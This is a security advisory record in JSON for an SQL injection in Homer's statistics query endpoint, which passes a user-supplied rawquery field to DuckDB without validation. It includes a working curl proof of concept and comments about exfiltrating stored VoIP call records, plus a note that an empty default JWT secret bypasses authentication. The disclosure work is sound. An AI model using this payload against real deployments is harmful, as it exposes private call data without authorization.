{"id":"GHSA-f46q-3v67-fmm4","summary":"Homer: Authenticated SQL Injection via Unvalidated rawquery Field in /api/v4/statistics/query","details":"### Summary\nThe `V4StatisticsQuery` handler passes the user-supplied `rawquery` field directly to DuckDB without calling the `sqlvalidator.ValidateRawSQL` function used throughout the rest of the codebase. Any authenticated user can execute arbitrary SQL statements against all data accessible through the FlightSQL service.\n\n### Details\n**`coordinator/handlers/statistics_v4.go` lines 74-107** — `V4StatisticsQuery`:\n```go\nquery := &model.V4StatisticsQuery{}\nif err = c.Bind(query); err != nil { ... }\n// No ValidateRawSQL call here — contrast with other handlers:\nresults, err := h.flightService.Query(c.Request().Context(), query.RawQuery)\n```\n\n**Contrast with `coordinator/handlers/search.go` line 194** — secure pattern not followed:\n```go\nif err := sqlvalidator.ValidateRawSQL(rawQuery); err != nil {\n    return c.JSON(http.StatusBadRequest, ...)\n}\n```\n\n`query.RawQuery` is whatever the caller submitted; it is passed verbatim to the FlightSQL/DuckDB backend. The handler is registered under the `protected` group (requires JWT), but given that the default JWT secret is empty (see related advisory), this is effectively pre-authentication on a default deployment.\n\n### PoC\n```bash\n# With a valid JWT (or empty JWT secret bypass):\ncurl -s -X POST http://\u003chomer-host\u003e/api/v4/statistics/query \\\n  -H \"Authorization: Bearer \u003cjwt\u003e\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"param\": {\n      \"query\": [{\"rawquery\": \"SELECT * FROM information_schema.tables\"}]\n    }\n  }'\n# Returns all table names accessible to the DuckDB FlightSQL service\n\n# Exfiltrate all stored call records:\n# \"rawquery\": \"SELECT * FROM hep LIMIT 1000\"\n# Arbitrary DuckDB SQL is accepted including INSTALL/LOAD for extension-based exfiltration\n```\n\n### Impact\nSQL Injection / Improper Neutralization of Special Elements (CWE-89). Any authenticated user can execute arbitrary SQL against all data accessible to the FlightSQL/DuckDB backend — including all stored VoIP call records, SIP messages, and metadata. Combined with the authentication bypass when JWT secret is empty, this is exploitable without credentials.\n\n### Fix\nApply `sqlvalidator.ValidateRawSQL()` to `query.RawQuery` before passing it to `h.flightService.Query()`, matching the pattern already used in `search.go` and `transactions_v4.go`.\n\nIf possible, please apply for a CVE number when posting.","aliases":["CVE-2026-62251"],"modified":"2026-10-07T16:30:06.540504563Z","published":"2026-10-07T16:13:08Z","database_specific":{"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2026-10-07T16:13:08Z","nvd_published_at":null,"cwe_ids":["CWE-89"]},"references":[{"type":"WEB","url":"https://github.com/sipcapture/homer/security/advisories/GHSA-f46q-3v67-fmm4"},{"type":"WEB","url":"https://github.com/sipcapture/homer/pull/837"},{"type":"WEB","url":"https://github.com/sipcapture/homer/commit/a7d027dc684b210b62285c49f555ac88d64f35f0"},{"type":"PACKAGE","url":"https://github.com/sipcapture/homer"},{"type":"WEB","url":"https://github.com/sipcapture/homer/releases/tag/11.0.283"}],"affected":[{"package":{"name":"github.com/sipcapture/homer-app","ecosystem":"Go","purl":"pkg:golang/github.com/sipcapture/homer-app"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"0.0.0-20260625085520-a7d027dc684b"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/10/GHSA-f46q-3v67-fmm4/GHSA-f46q-3v67-fmm4.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"}]}